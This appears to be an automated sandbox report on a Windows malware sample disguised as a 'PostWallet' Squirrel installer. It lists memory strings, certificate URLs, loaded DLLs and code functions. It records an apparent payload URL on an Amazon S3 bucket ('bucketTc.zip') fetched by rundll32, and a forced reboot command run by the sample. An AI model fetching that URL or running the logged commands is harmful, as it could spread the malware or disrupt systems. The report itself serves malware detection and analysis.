          Source: Update.exe, 00000002.00000002.1680892254.0000000002869000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1680892254.000000000297F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/lib/net48/vcruntime140.dll
          Source: Update.exe, 00000002.00000002.1680892254.0000000002869000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1680892254.000000000297F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/lib/net48/vmwarebase.dll
          Source: Update.exe, 00000002.00000002.1680892254.000000000288A000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1680892254.0000000002869000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1680892254.0000000002997000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1680892254.000000000297F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/package/services/metadata/core-properties/0efccca87b4345efa345d5a58c8332f0.p
          Source: Update.exe, 00000002.00000002.1680892254.0000000002869000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1680892254.000000000297F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/tempfiles/sample.bsdiff
          Source: Update.exe, 00000002.00000002.1680892254.0000000002869000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1680892254.000000000297F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/tempfiles/sample.diff
          Source: Update.exe, 00000002.00000002.1680892254.0000000002869000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1680892254.000000000297F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/tempfiles/sample.dll
          Source: Update.exe, 00000002.00000002.1680892254.0000000002869000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1680892254.000000000297F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/tempfiles/sample.exe
          Source: Update.exe, 00000002.00000002.1680892254.0000000002869000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1680892254.000000000297F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/tempfiles/sample.nuspec
          Source: Update.exe, 00000002.00000002.1680892254.0000000002869000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1680892254.000000000297F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/tempfiles/sample.psmdcp
          Source: Update.exe, 00000002.00000002.1680892254.0000000002869000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1680892254.000000000297F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/tempfiles/sample.rels
          Source: Update.exe, 00000002.00000002.1680892254.0000000002869000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1680892254.000000000297F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/tempfiles/sample.shasum
          Source: Update.exe, 00000002.00000002.1680892254.00000000027BD000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1680892254.0000000002794000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe.2.drString found in binary or memory: http://ocsp.digicert.com0
          Source: Update.exe, 00000002.00000002.1680892254.00000000027BD000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1680892254.0000000002794000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe.2.drString found in binary or memory: http://ocsp.digicert.com0A
          Source: Update.exe, 00000002.00000002.1680892254.00000000027BD000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1680892254.0000000002794000.00000004.00000800.00020000.00000000.sdmp, ClassicIE_64.exe0.12.dr, ClassicExplorerSettings.exe.12.dr, ClassicExplorer64.dll.12.dr, ClassicExplorer32.dll.12.dr, FilePost?a.exe.2.dr, ClassicStartMenu.exe.12.drString found in binary or memory: http://ocsp.digicert.com0C
          Source: Update.exe, 00000002.00000002.1680892254.00000000027BD000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1680892254.0000000002794000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe.2.drString found in binary or memory: http://ocsp.digicert.com0L
          Source: ClassicIE_64.exe0.12.dr, ClassicExplorerSettings.exe.12.dr, ClassicExplorer64.dll.12.dr, ClassicExplorer32.dll.12.dr, ClassicStartMenu.exe.12.drString found in binary or memory: http://ocsp.digicert.com0N
          Source: Update.exe, 00000002.00000002.1680892254.00000000027BD000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1680892254.0000000002794000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe.2.drString found in binary or memory: http://ocsp.digicert.com0X
          Source: Update.exe, 00000002.00000002.1680892254.00000000027BD000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1680892254.0000000002794000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe.2.drString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
          Source: Update.exe, 00000002.00000002.1680892254.00000000027BD000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1680892254.0000000002794000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe.2.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
          Source: Update.exe, 00000002.00000002.1680892254.00000000027BD000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1680892254.0000000002794000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe.2.drString found in binary or memory: http://ocsp2.globalsign.com/rootr606
          Source: Update.exe, 00000002.00000002.1680892254.000000000297F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.openxmlformats.or
          Source: Update.exe, 00000002.00000002.1680892254.00000000027BD000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1680892254.0000000002794000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe.2.drString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
          Source: ClassicExplorer64.dll.12.dr, ClassicExplorer32.dll.12.drString found in binary or memory: http://www.classicshell.net
          Source: ClassicExplorer64.dll.12.dr, ClassicExplorer32.dll.12.drString found in binary or memory: http://www.classicshell.net%s%sClassicShell.chm%s%sClassicShell.chm::/%s.html
          Source: ClassicExplorer64.dll.12.dr, ClassicExplorer32.dll.12.drString found in binary or memory: http://www.classicshell.net/files/updates/update_PA
          Source: rundll32.exe, rundll32.exe, 0000000C.00000002.4088855611.0000000000428000.00000020.00000001.01000000.0000000D.sdmp, Main.dll.7.dr, ClassicIE_64.dll.12.drString found in binary or memory: http://www.delphiforfun.org/
          Source: Update.exe, 00000002.00000002.1680892254.00000000027BD000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1680892254.0000000002794000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe.2.drString found in binary or memory: http://www.digicert.com/CPS0
          Source: Update.exe, 00000002.00000002.1680892254.00000000027BD000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1680892254.0000000002794000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe.2.drString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
          Source: Update.exe, 00000002.00000002.1680892254.00000000027BD000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1680892254.0000000002794000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe.2.drString found in binary or memory: http://www.vmware.com/0
          Source: Update.exe, 00000002.00000002.1680892254.00000000027BD000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1680892254.0000000002794000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe.2.drString found in binary or memory: http://www.vmware.com/0/
          Source: ClassicExplorer64.dll.12.dr, ClassicExplorer32.dll.12.drString found in binary or memory: http://www.yoursite.com
          Source: Update.exeString found in binary or memory: https://api.github.com/#
          Source: rundll32.exe, 0000000C.00000002.4091911884.000001A76A94F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bucreate203920233.s3.sa-east-1.amazonaws.com/
          Source: rundll32.exe, 0000000C.00000002.4091911884.000001A76A94F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bucreate203920233.s3.sa-east-1.amazonaws.com/Vh$o
          Source: rundll32.exe, 0000000C.00000002.4091911884.000001A76A901000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.4091911884.000001A76A94F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.4093722104.000001A76AAAF000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.4091911884.000001A76A8DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bucreate203920233.s3.sa-east-1.amazonaws.com/bucketTc.zip
          Source: rundll32.exe, 0000000C.00000002.4091911884.000001A76A94F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bucreate203920233.s3.sa-east-1.amazonaws.com/bucketTc.zip8
          Source: rundll32.exe, 0000000C.00000002.4091911884.000001A76A94F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bucreate203920233.s3.sa-east-1.amazonaws.com/bucketTc.zipv
          Source: Update.exeString found in binary or memory: https://github.com/myuser/myrepo
          Source: rundll32.exe, 0000000C.00000002.4091911884.000001A76A94F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
          Source: Update.exe, 00000002.00000002.1680892254.00000000027BD000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1680892254.0000000002794000.00000004.00000800.00020000.00000000.sdmp, ClassicIE_64.exe0.12.dr, ClassicExplorerSettings.exe.12.dr, ClassicExplorer64.dll.12.dr, ClassicExplorer32.dll.12.dr, FilePost?a.exe.2.dr, ClassicStartMenu.exe.12.drString found in binary or memory: https://www.digicert.com/CPS0
          Source: Update.exe, 00000002.00000002.1680892254.00000000027BD000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1680892254.0000000002794000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe.2.drString found in binary or memory: https://www.globalsign.com/repository/0
          Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
          Source: unknownHTTPS traffic detected: 16.12.1.14:443 -> 192.168.2.4:49729 version: TLS 1.2

          System Summary

          barindex
          Uses shutdown.exe to shutdown or reboot the system
          Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\shutdown.exe C:\WINDOWS\system32\shutdown.exe -r -t 1 -f
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 3_2_00346EA0 memset,EnterCriticalSection,EnterCriticalSection,memcpy,LeaveCriticalSection,GetTokenInformation,GetLastError,Warning,GetTokenInformation,EqualSid,LeaveCriticalSection,Warning,Warning,free,free,DuplicateTokenEx,GetLastError,free,free,AllocateAndInitializeSid,GetLastError,Warning,SetTokenInformation,GetLastError,Warning,FreeSid,free,free,Warning,GetLastError,free,ImpersonateLoggedOnUser,GetLastError,Warning,GetLastError,free,_stricmp,free,free,Warning,Warning,CreateProcessAsUserW,free,free,GlobalMemoryStatusEx,GetLastError,free,free,SetProcessWorkingSetSize,GetLastError,ResumeThread,CloseHandle,free,free,GetLastError,GetCurrentProcess,IsWow64Process,GetTokenInformation,GetLastError,Warning,free,free,Warning,Warning,free,free,free,free,free,free,Warning,TerminateProcess,CloseHandle,CloseHandle,CloseHandle,3_2_00346EA0
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeCode function: 2_2_00007FFD9B8AB07D2_2_00007FFD9B8AB07D
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeCode function: 2_2_00007FFD9B8A0F182_2_00007FFD9B8A0F18
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeCode function: 2_2_00007FFD9B8A0F252_2_00007FFD9B8A0F25
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeCode function: 2_2_00007FFD9B8C41902_2_00007FFD9B8C4190
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeCode function: 2_2_00007FFD9B8C312D2_2_00007FFD9B8C312D
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 3_2_00345C703_2_00345C70
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 3_2_00344D003_2_00344D00
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 3_2_6D176D0F3_2_6D176D0F
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 3_2_6D16CC4C3_2_6D16CC4C
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 3_2_6D153CE03_2_6D153CE0
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 3_2_6D165F803_2_6D165F80
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 3_2_6D179FC03_2_6D179FC0
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 3_2_6D1609803_2_6D160980
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 3_2_6D152BD03_2_6D152BD0
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 3_2_6D165A803_2_6D165A80
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 3_2_6D15EAE03_2_6D15EAE0
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 3_2_6D17550B3_2_6D17550B
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 3_2_6D14F5603_2_6D14F560
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 3_2_6D16E5E53_2_6D16E5E5
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 3_2_6D1824893_2_6D182489
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 3_2_6D15F7603_2_6D15F760
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 3_2_6D1656603_2_6D165660
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 3_2_6D15F0F03_2_6D15F0F0
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 3_2_6D15F3143_2_6D15F314
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 3_2_6D18A33D3_2_6D18A33D
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 3_2_6D15E3503_2_6D15E350
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 3_2_6D18A21D3_2_6D18A21D
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 3_2_6D1782223_2_6D178222
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 3_2_6E39A6F83_2_6E39A6F8
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 3_2_6E398D5F3_2_6E398D5F
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 3_2_6E3933203_2_6E393320
          Source: C:\Windows\System32\rundll32.exeCode function: 12_2_00414B5012_2_00414B50
          Source: C:\Windows\System32\rundll32.exeCode function: 12_2_0043822012_2_00438220
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: String function: 00343B70 appears 41 times
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: String function: 003427C0 appears 89 times
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: String function: 003493B4 appears 49 times
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: String function: 6D168690 appears 58 times
          Source: 00023948209303294#U00ac320302282349843984903.exeStatic PE information: Resource name: DATA type: Zip archive data, at least v2.0 to extract, compression method=deflate
          Source: Full Glass.skin.12.drStatic PE information: No import functions for PE file found
          Source: Smoked Glass.skin.12.drStatic PE information: No import functions for PE file found
          Source: Windows Aero.skin7.12.drStatic PE information: No import functions for PE file found
          Source: EppManifest.dll.12.drStatic PE information: No import functions for PE file found
          Source: Classic Skin.skin.12.drStatic PE information: No import functions for PE file found
          Source: Windows Basic.skin.12.drStatic PE information: No import functions for PE file found
          Source: Metro.skin.12.drStatic PE information: No import functions for PE file found
          Source: Windows 8.skin7.12.drStatic PE information: No import functions for PE file found
          Source: Windows 8.skin.12.drStatic PE information: No import functions for PE file found
          Source: Classic Skin.skin7.12.drStatic PE information: No import functions for PE file found
          Source: Metro.skin7.12.drStatic PE information: No import functions for PE file found
          Source: Windows Aero.skin.12.drStatic PE information: No import functions for PE file found
          Source: Midnight.skin7.12.drStatic PE information: No import functions for PE file found
          Source: MsMpLics.dll.12.drStatic PE information: No import functions for PE file found
          Source: Windows XP Luna.skin.12.drStatic PE information: No import functions for PE file found
          Source: Metallic.skin7.12.drStatic PE information: No import functions for PE file found
          Source: 00023948209303294#U00ac320302282349843984903.exe, 00000001.00000003.1630405410.00000000012B1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUpdate.exe2 vs 00023948209303294#U00ac320302282349843984903.exe
          Source: 00023948209303294#U00ac320302282349843984903.exe, 00000001.00000003.1630405410.00000000012BF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUpdate.exe2 vs 00023948209303294#U00ac320302282349843984903.exe
          Source: 00023948209303294#U00ac320302282349843984903.exeBinary or memory string: OriginalFilenameSetup.exe6 vs 00023948209303294#U00ac320302282349843984903.exe
          Source: C:\Users\user\Desktop\00023948209303294#U00ac320302282349843984903.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\00023948209303294#U00ac320302282349843984903.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\00023948209303294#U00ac320302282349843984903.exeSection loaded: logoncli.dllJump to behavior
          Source: C:\Users\user\Desktop\00023948209303294#U00ac320302282349843984903.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\Desktop\00023948209303294#U00ac320302282349843984903.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\00023948209303294#U00ac320302282349843984903.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\00023948209303294#U00ac320302282349843984903.exeSection loaded: sxs.dllJump to behavior
          Source: C:\Users\user\Desktop\00023948209303294#U00ac320302282349843984903.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Users\user\Desktop\00023948209303294#U00ac320302282349843984903.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Users\user\Desktop\00023948209303294#U00ac320302282349843984903.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\00023948209303294#U00ac320302282349843984903.exeSection loaded: logoncli.dllJump to behavior
          Source: C:\Users\user\Desktop\00023948209303294#U00ac320302282349843984903.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\Desktop\00023948209303294#U00ac320302282349843984903.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\00023948209303294#U00ac320302282349843984903.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\00023948209303294#U00ac320302282349843984903.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\00023948209303294#U00ac320302282349843984903.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\00023948209303294#U00ac320302282349843984903.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: dwrite.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: msvcp140_clr0400.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: linkinfo.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: slc.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: wtsapi32.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: winsta.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: umpdc.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: dwmapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: d3d9.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: d3d10warp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: textshaping.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: dataexchange.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: d3d11.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: dcomp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: dxgi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: twinapi.appcore.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: textinputframework.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: coreuicomponents.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: msctfui.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: uiautomationcore.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: resourcepolicyclient.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: dxcore.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: sxs.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: explorerframe.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: vcruntime140.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: vmwarebase.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: slc.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: pcacli.dllJump to behavior
